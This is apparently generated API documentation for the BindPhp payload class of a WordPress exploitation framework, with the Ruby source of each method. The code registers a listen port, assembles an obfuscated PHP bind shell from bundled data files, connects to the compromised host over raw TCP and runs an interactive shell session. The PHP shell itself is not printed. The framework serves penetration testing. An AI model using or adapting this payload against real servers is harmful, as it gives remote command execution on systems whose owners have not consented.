Class: Wpxf::Payloads::BindPhp

Inherits:
Wpxf::Payload
Includes:
Wpxf, Options, SocketHelper
Defined in:
lib/wpxf/payloads/bind_php.rb

Overview

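A PHP bind shell payload. The PHP code listens for an incoming TCP connection on the port set by the `lport` option, and the framework then connects to that IPv4 address and port to open the session. The connection is made directly over TCP, so the session appears on the network as an inbound connection to that port on the host. The module's `proxy` option applies only to its HTTP requests and is not used for this connection.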

Instance Attribute Summary

Attributes included from Options

#datastore, #options

Attributes inherited from Wpxf::Payload

#queued_commands

Instance Method Summary

Methods included from SocketHelper

#execute_queued_commands, #start_socket_io_loop, #start_socket_read_loop, #start_socket_write_loop

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Wpxf::Payload

#encoded, #enqueue_command, #escape_single_quotes, #generate_vars, #php_preamble, #random_var_name

Constructor Details

#initialize ⇒ BindPhp

Returns a new instance of BindPhp.



# File 'lib/wpxf/payloads/bind_php.rb', line 13

# Builds the payload and registers its one user-facing option.
#
# `lport` is the TCP port used to listen for incoming connections (see the
# option description below); it is required and defaults to 1234.
#
# @return [BindPhp] a new instance of BindPhp
def initialize
  super

  listen_port = PortOption.new(
    name: 'lport',
    required: true,
    default: 1234,
    desc: 'The port being used to listen for incoming connections'
  )

  register_options([listen_port])
end

Instance Attribute Details

#host ⇒ Object

Returns the value of attribute host.



# File 'lib/wpxf/payloads/bind_php.rb', line 93

# Reader for the @host instance variable, the address passed to
# TCPSocket.new when the session is opened.
#
# @return [Object] the current value of @host (nil until it has been assigned)
def host
  @host
end

Instance Method Details

#check(mod) ⇒ Object



# File 'lib/wpxf/payloads/bind_php.rb', line 26

# Warns the operator when the module has a proxy configured.
#
# The session is a direct TCP connection, so a proxy that the module uses
# for its HTTP requests is not applied to it; the warning makes that
# explicit instead of leaving the operator to assume the traffic is proxied.
#
# @param mod [#get_option, #emit_warning] the module using this payload
# @return [Object, nil] the result of emit_warning, or nil when no proxy is set
def check(mod)
  return unless mod.get_option('proxy')

  notice = 'The proxy option for this module is only used for '\
           'HTTP connections and will NOT be used for the TCP '\
           'connection that the payload establishes'
  mod.emit_warning notice
end

#cleanup ⇒ Object



# File 'lib/wpxf/payloads/bind_php.rb', line 89

# Discards any commands still queued on this payload by replacing
# queued_commands with a fresh empty array.
#
# @return [Array] the new, empty queue
def cleanup
  self.queued_commands = []
end

#connect_to_host(event_emitter) ⇒ Object



# File 'lib/wpxf/payloads/bind_php.rb', line 42

# Opens the TCP connection to host:lport.
#
# The connection is a plain TCPSocket: nothing in this method wraps it in
# TLS or routes it through a proxy. No connect timeout is passed, so how
# long an unreachable host blocks is left to TCPSocket's defaults.
# Any StandardError raised while connecting is reported through emit_error
# rather than propagated.
#
# @param event_emitter [#emit_info, #emit_error] receiver for status messages
# @return [TCPSocket, nil] the connected socket, or nil if connecting failed
def connect_to_host(event_emitter)
  event_emitter.emit_info "Connecting to #{host}:#{lport}..."

  connection, failure =
    begin
      [TCPSocket.new(host, lport), '']
    rescue StandardError => e
      [nil, e]
    end

  return connection if connection

  event_emitter.emit_error "Failed to connect to #{host}:#{lport} #{failure}"
  connection
end

#constants ⇒ Object



# File 'lib/wpxf/payloads/bind_php.rb', line 80

# Named values this payload exposes: a single 'port' entry holding the
# configured listen port.
# NOTE(review): presumably read by the parent Payload class when it builds
# the PHP source; confirm against Wpxf::Payload.
#
# @return [Hash{String => Object}] { 'port' => lport }
def constants
  { 'port' => lport }
end

#lport ⇒ Object



# File 'lib/wpxf/payloads/bind_php.rb', line 34

# The configured listen port, read from the 'lport' option through
# normalized_option_value.
#
# @return [Object] the normalized 'lport' value
#   (presumably an Integer, since it is registered as a PortOption; confirm)
def lport
  normalized_option_value('lport')
end

#obfuscated_variables ⇒ Object



# File 'lib/wpxf/payloads/bind_php.rb', line 72

# Extends the inherited list of variable names with the ones this payload
# adds.
# NOTE(review): presumably these are PHP variable names that the parent
# class replaces with generated ones (see #generate_vars / #random_var_name
# on Wpxf::Payload); if so, the literal names below will not appear in the
# emitted payload. Confirm against the parent class.
#
# @return [Array<String>] the parent's names followed by this payload's names
def obfuscated_variables
  payload_names = %w[
    cmd disabled output handle pipes fp
    port scl sock ret msg_sock r w e
  ]

  super + payload_names
end

#post_exploit(mod) ⇒ Object



# File 'lib/wpxf/payloads/bind_php.rb', line 57

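# Opens the session after the module has run and drives it until the I/O
# loop returns.
#
# The socket is closed in an `ensure` so that an exception raised by the
# I/O loop does not leave the connection open; the exception itself still
# propagates to the caller.
#
# @param mod [#emit_success, #emit_info] the module using this payload; it is
#   also handed to connect_to_host and start_socket_io_loop
# @return [Boolean] false when no connection could be made, true once the
#   session has ended normally
def post_exploit(mod)
  socket = connect_to_host(mod)
  return false unless socket

  Wpxf.change_stdout_sync(true) do
    mod.emit_success 'Established a session'

    begin
      start_socket_io_loop(socket, mod)
    ensure
      # Always release the connection, even if the I/O loop raised.
      socket.close
    end

    puts
    mod.emit_info "Disconnected from #{host}:#{lport}"
  end

  true
end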

#prepare(mod) ⇒ Object



# File 'lib/wpxf/payloads/bind_php.rb', line 38

# Copies the module's 'host' option value onto this payload so that the
# later connection uses the same host the module is configured with.
#
# @param mod [#get_option_value] the module using this payload
# @return [Object] the value assigned to host
def prepare(mod)
  target_host = mod.get_option_value('host')
  self.host = target_host
end

#raw ⇒ Object



# File 'lib/wpxf/payloads/bind_php.rb', line 84

# Assembles the payload's PHP source from two bundled data files: the
# contents of 'exec_methods.php' followed by the contents of 'bind_php.php',
# both loaded from the 'php' data directory.
#
# @return [String] the two files' php_content values concatenated in that order
def raw
  exec_helpers = DataFile.new('php', 'exec_methods.php').php_content
  bind_shell = DataFile.new('php', 'bind_php.php').php_content

  "#{exec_helpers}#{bind_shell}"
end